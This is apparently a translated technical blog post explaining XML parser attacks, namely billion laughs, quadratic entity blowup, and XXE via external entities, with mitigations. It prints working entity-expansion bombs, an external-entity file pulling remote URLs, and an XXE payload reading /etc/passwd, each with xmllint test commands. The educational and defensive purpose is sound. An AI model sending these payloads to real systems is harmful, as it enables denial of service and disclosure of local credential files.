How to make a bomb out of XML

A discussion of various vulnerabilities related to XML parsing was published in the oss-security mailing list. Vulnerabilities affect applications that allow libraries to handle named and external entities in a DTD embedded in an XML document obtained from a untrusted source. Those. in fact, applications that do not change the default parser settings.

Examples of XML bombs under the cut. If you have applications that handle XML, you can check them yourself for vulnerabilities. The bombs in this post are checked using the example of the xmllint utility, included with the libxml2 library, but other parsers can be used.

')

Theory

The XML standard allows XML documents to use DTDs to define valid constructs from nested tags and attributes. The DTD can either be represented as a link to an external source, or be completely defined within the document itself. Example document with embedded DTD:

<!DOCTYPE greeting [ <!ELEMENT greeting (#PCDATA)> ]> <greeting>Hello, world!</greeting>

In the DTD, in addition to the elements and attributes, you can define entities. An example of a document using named entities:

 <!DOCTYPE greeting [ <!ENTITY target "world"> <!ELEMENT greeting (#PCDATA)> ]> <greeting>Hello, &target;!</greeting>

You can check this document for validity and reveal entities as follows:

 $ xmllint --noent --valid hello.xml

Exponential Inflating Entities

Named entities can be expanded not only in character strings, but also in a sequence of other entities. Recursion is prohibited by the standard , but there are no restrictions on the allowed depth of nesting. This allows you to achieve a compact representation of very long text lines (similar to how archivers do it) and forms the basis of the attack “billion laughs”, known since 2003 .

 <!DOCTYPE bomb [ <!ENTITY a "1234567890" > <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;"> <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;"> <!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;"> <!ELEMENT bomb (#PCDATA)> ]> <bomb>&d;</bomb>

Modern XML parsers contain protection against such an attack. For example, libxml2 by default refuses to parse this document, despite its strict compliance with the standard:

 $ xmllint --noent --valid bomb1.xml Entity: line 1: parser error : Detected an entity reference loop &c;&c;&c;&c;&c;&c;&c;&c; ^ bomb1.xml:8: parser error : Detected an entity reference loop <bomb>&d;</bomb> ^

In order to see how much it swells when disclosing entities, you must explicitly disable protection against this attack:

 $ xmllint --noent --valid --huge bomb1.xml | wc -c 5344

Obviously, adding a new entity, by analogy with the ones already mentioned, inflates the output stream approximately as many times as there are references to the previous entity in the newly added one. The input document is increased by the number of bytes proportional to the number of links. Those. there is an exponential relationship between the size of the input XML document and the output stream of characters.

A small XML document can cause a disproportionately large consumption of resources (such as RAM and processor time) for the task of parsing it up to tags and character strings. Before us is a typical DoS attack, based on a significant difference in the complexity of the algorithm used in the typical and worst case.

Quadratic bloat of entities

As we have already seen, some libraries to combat the attack of “billion laughs” impose a hard artificial restriction on the depth of the tree of named entities. Such a restriction does indeed prevent an exponential relationship between the size of the input XML file and the output character stream. However, for a hacker seeking to use up all the server resources with a relatively small XML document, there is no need for an exponential relationship between these values. Quadratic dependence will completely disappear, but for it one level of named entities is enough. We will simply repeat one long entity many times:

 <!DOCTYPE bomb [ <!ENTITY x "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx...x" > <!ELEMENT bomb (#PCDATA)> ]> <bomb>&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;...&x;</bomb>

 $ xmllint --huge --noent --valid bomb2.xml | wc -c 1868

The option --huge is added for the case, your version of libxml2 will consider that the given example is an attack. She was taught this by this commit , i.e. at the time of posting the corresponding change did not have time to get into the release.

External entities

The XML standard contains the ability to get the values of entities not only from ready-made strings, but also by accessing external resources, for example, via HTTP. This makes it possible for an attacker with access to the XML parser on a zombie server to scan ports and even organize DoS attacks on other servers, hiding their IP address. This XML file, when trying to parse it with a parser that supports external entities, will create three requests to Habr's RSS feeds:

 <!DOCTYPE bomb [ <!ENTITY a1 SYSTEM "http://habrahabr.ru/rss/best/" > <!ENTITY a2 SYSTEM "http://habrahabr.ru/rss/hubs/" > <!ENTITY a3 SYSTEM "http://habrahabr.ru/rss/qa/" > <!ELEMENT author ANY> <!ELEMENT blockquote ANY> <!ELEMENT category ANY> <!ELEMENT channel ANY> <!ELEMENT code ANY> <!ELEMENT description ANY> <!ELEMENT generator ANY> <!ELEMENT guid ANY> <!ATTLIST guid isPermaLink CDATA #IMPLIED> <!ELEMENT h3 ANY> <!ELEMENT i ANY> <!ELEMENT image ANY> <!ELEMENT item ANY> <!ELEMENT language ANY> <!ELEMENT lastBuildDate ANY> <!ELEMENT link ANY> <!ELEMENT managingEditor ANY> <!ELEMENT pre ANY> <!ELEMENT pubDate ANY> <!ELEMENT rss ANY> <!ATTLIST rss version CDATA #IMPLIED> <!ELEMENT title ANY> <!ELEMENT url ANY> <!ELEMENT bomb ANY> ]> <bomb>&a1;&a2;&a3;</bomb>

 $ xmllint --noent --noout --load-trace bomb3.xml

In the example above, you can prevent the parser from reading entities from the network by passing the --nonet key.

In the same way, you can force the vulnerable application to read local files with secret information like a password for the database. Unfortunately, here --nonet does not help:

 <!DOCTYPE bomb [ <!ENTITY passwd SYSTEM "file:///etc/passwd" > <!ELEMENT bomb (#PCDATA)> ]> <bomb>&passwd;</bomb>

 $ xmllint --noent --nonet --valid bomb4.xml

This type of attack is called XXE (from XML eXternal Entity). A recent example is a vulnerability in PostgreSQL, CVE-2012-3489 .

Conclusion

Now let's talk about preventing such attacks.

Of course, you must use library versions that take countermeasures against these and other vulnerabilities. You must explicitly limit the resources spent on parsing an XML document. For example, for libxml2, this can be done by calling xmlMemSetup () and passing its own memory management functions, which simply will not allow to allocate too much. It is also necessary to restrict access to external resources, for example, by writing your own entity loader .

There is, however, the opinion that all measures listed above are aimed at the symptoms, and not at the heart of the listed vulnerabilities. Indeed, where did the task of parsing an XML document according to the DTD mentioned (or contained) in it come from in your application? Wouldn't it be more correct to parse this XML document according to the rules of your application? After all, you check the validity of the data in the HTML form according to the regular expressions found in the code of its handler, and not the one that came along with the form data. Accordingly, you will have enough of the non-DTD (and therefore, non-validating) XML parser, in which the necessary entities are loaded in advance.

Source: https://habr.com/ru/post/170333/

All Articles